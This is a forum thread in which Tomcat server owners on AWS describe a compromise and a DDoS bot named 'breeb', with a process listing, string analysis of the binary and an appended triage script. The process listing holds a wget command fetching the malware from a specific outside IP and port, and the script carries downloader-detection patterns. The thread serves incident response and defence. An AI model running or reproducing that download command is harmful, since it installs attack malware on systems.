AWS EBS Tomcat instance being hacked
I'm using AWS EBS instances with tomcat for my java web application. But somehow some guy manages to hack into my instances and all I can see are these processes being run by tomcat:
tomcat 26988 0.2 0.1 180304 2972 ? S 11:18 0:00 wget 220.133.87.149:49120/breeb
tomcat 1898 0.0 0.0 75252 736 ? Ssl 11:18 0:00 ./breeb
These processes send out lots of random packets (in TBs) within minutes. The IP (http://220.133.87.149:49120/) from where these malicious files are being downloaded contains many other malicious files.
Does anyone have any idea what I am dealing with? Below are my security settings for AWS instances:
Inbound:
80 tcp 0.0.0.0/0
22 tcp 0.0.0.0/0
Outbound:
All traffic All Protocol All IPs
* THREAD TAKEN TO AWS FORUMS *
forums.aws.amazon.com/thread.jspa?threadID=227061&tstart=0
I had the same problem last week:
My amazon server was somehow compromised. I received an abuse report from amazon stating my server was being used in a DDOS attack on a website.
When I logged in I found an application /usr/share/tomcat7/breeb was running in memory. I expect there is a weakness in tomcat 7 which means a remote user is able to upload a spam client to my server and execute it as the tomcat user. Very worrying.
Looks to me like the ‘breeb’ application is written in c++ and has the following footprint
-rwxrwxrwx 1 tomcat tomcat 1223123 Nov 7 23:54 breeb
-rw-r--r-- 1 tomcat tomcat 1223123 Nov 7 23:54 breeb.1
-rw-r--r-- 1 tomcat tomcat 1223123 Nov 7 23:54 breeb.2
-rw-r--r-- 1 tomcat tomcat 1223123 Nov 7 23:54 breeb.3
Some of the c++ classes are a bit of a giveaway:
[ec2-user tmp]$ strings breeb | grep .cpp
AmpResource.cpp
Attack.cpp
CmdMsg.cpp
ConfigDoing.cpp
DNSCache.cpp
ExChange.cpp
Global.cpp
Main.cpp
ThreadDoFun.cpp
...
Googling "linux backdoor 1223123", which is the byte size of the spam client, brings up a lot of virus alerts.
Other 'strings' in the compiled breeb application include a large list of IP addresses; they are all Chinese and feature in a lot of malware reports.
Can't seem to get any recognition of this issue on any of the forums. I've since rebuilt the server with tomcat8 and it has been running for a few days without problems... Would be nice to know what the attack vector was.
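A quick triage check along the lines of what both posters did by hand, added here as an example and not part of the thread: it lists every process owned by the tomcat service account whose command is not the JVM, so a stray downloader such as `wget` or a relative-path binary such as `./breeb` stands out. The `ps aux` sample is constructed from the lines in the question, and the check assumes the service account is named `tomcat` and that the JVM is invoked as `java` or `.../java`.

```shell
#!/bin/sh
# Constructed sample of `ps aux` output, modelled on the processes in the post.
SAMPLE_PS='USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
tomcat 1234 5.0 10.2 3000000 800000 ? Sl 11:00 1:00 /usr/lib/jvm/java/bin/java -Dcatalina.base=/usr/share/tomcat7 org.apache.catalina.startup.Bootstrap start
tomcat 26988 0.2 0.1 180304 2972 ? S 11:18 0:00 wget 220.133.87.149:49120/breeb
tomcat 1898 0.0 0.0 75252 736 ? Ssl 11:18 0:00 ./breeb
root 1 0.0 0.0 19000 1000 ? Ss 10:00 0:01 /sbin/init'

# flag_tomcat_procs USER
# Reads `ps aux` lines on stdin and prints "PID COMMAND REASON" for every
# process owned by USER whose command word is not the JVM. The service account
# should only ever run java; anything else is worth a look.
flag_tomcat_procs() {
  user="$1"
  awk -v u="$user" '
    NR > 1 && $1 == u && $11 !~ /(^|\/)java$/ {
      reason = "not-jvm"
      if ($11 ~ /^\.\//)              reason = "relative-path"   # e.g. ./breeb
      else if ($11 ~ /^(wget|curl)$/) reason = "downloader"      # fetching payloads
      print $2, $11, reason
    }'
}

# Demo on the constructed sample; on a live instance use: ps aux | flag_tomcat_procs tomcat
printf '%s\n' "$SAMPLE_PS" | flag_tomcat_procs tomcat
```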